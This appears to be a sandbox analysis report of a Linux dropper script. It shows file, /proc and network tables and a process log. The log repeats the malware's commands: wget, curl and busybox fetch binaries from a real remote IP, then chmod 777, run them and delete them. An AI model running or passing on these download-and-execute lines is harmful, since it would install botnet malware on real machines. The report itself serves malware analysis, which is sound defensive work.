| N/A | /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR | /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR | N/A |
| N/A | /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t | /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t | N/A |
| N/A | /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | N/A |
| N/A | /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK | /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK | N/A |
| N/A | /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt | /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 | /usr/bin/curl | N/A |
Processes
/tmp/84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
[/tmp/84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/bin/chmod
[chmod 777 I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt
[./I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/bin/rm
[rm I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/usr/bin/wget
[wget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]
/bin/chmod
[chmod 777 VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]
/tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw
[./VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]
/bin/rm
[rm VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]
/usr/bin/wget
[wget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]
/bin/chmod
[chmod 777 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]
/tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ
[./3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]
/bin/rm
[rm 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]
/usr/bin/wget
[wget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]
/bin/chmod
[chmod 777 zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]
/tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q
[./zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]
/bin/rm
[rm zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]
/usr/bin/wget
[wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]
/bin/chmod
[chmod 777 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]
/tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG
[./6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]
/bin/rm
[rm 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]
/usr/bin/wget
[wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]
/bin/chmod
[chmod 777 nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]
/tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK
[./nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]
/bin/rm
[rm nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]
/usr/bin/wget
[wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]
/bin/chmod
[chmod 777 UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]
/tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW
[./UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]
/bin/rm
[rm UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]
/usr/bin/wget
[wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]
/bin/chmod
[chmod 777 MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]
/tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq
[./MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]
/bin/rm
[rm MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]
/usr/bin/wget
[wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]
/bin/chmod
[chmod 777 WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]
/tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh
[./WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]
/bin/rm
[rm WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]
/usr/bin/wget
[wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]
/bin/chmod
[chmod 777 Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]
/tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4
[./Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]
/bin/rm
[rm Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]
/usr/bin/wget
[wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]
/bin/chmod
[chmod 777 luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]
/tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P
[./luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]
/bin/rm
[rm luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]
/usr/bin/wget
[wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]
/bin/chmod
[chmod 777 U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]
/tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT
[./U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]
/bin/rm
[rm U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]
/usr/bin/wget
[wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]
/bin/chmod
[chmod 777 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]
/tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR
[./7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]
/bin/rm
[rm 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]
/usr/bin/wget
[wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]
/bin/chmod
[chmod 777 YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]
/tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t
[./YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]
/bin/rm
[rm YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]
/usr/bin/wget
[wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]
/bin/chmod
[chmod 777 UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]
/tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW
[./UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]
/bin/rm
[rm UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]
/usr/bin/wget
[wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]
/bin/chmod
[chmod 777 MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]
/tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq
[./MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]
/bin/rm
[rm MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]
/usr/bin/wget
[wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]
/bin/chmod
[chmod 777 WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]
/tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh
[./WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]
/bin/rm
[rm WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]
/usr/bin/wget
[wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]
/bin/chmod
[chmod 777 Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]
/tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4
[./Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]
/bin/rm
[rm Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]
/usr/bin/wget
[wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]
/bin/chmod
[chmod 777 luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]
/tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P
[./luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]
/bin/rm
[rm luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]
/usr/bin/wget
[wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]
/bin/chmod
[chmod 777 U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]
/tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT
[./U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]
/bin/rm
[rm U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]
/usr/bin/wget
[wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]
/bin/chmod
[chmod 777 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]
/tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR
[./7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]
/bin/rm
[rm 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]
/usr/bin/wget
[wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]
/bin/chmod
[chmod 777 YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]
/tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t
[./YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]
/bin/rm
[rm YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]
/usr/bin/wget
[wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]
/bin/chmod
[chmod 777 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]
/tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG
[./6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]
/bin/rm
[rm 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]
/usr/bin/wget
[wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]
/bin/chmod
[chmod 777 nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]
/tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK
[./nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]
/bin/rm
[rm nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]
/usr/bin/wget
[wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/bin/chmod
[chmod 777 I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt
[./I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/bin/rm
[rm I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/usr/bin/wget
[wget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
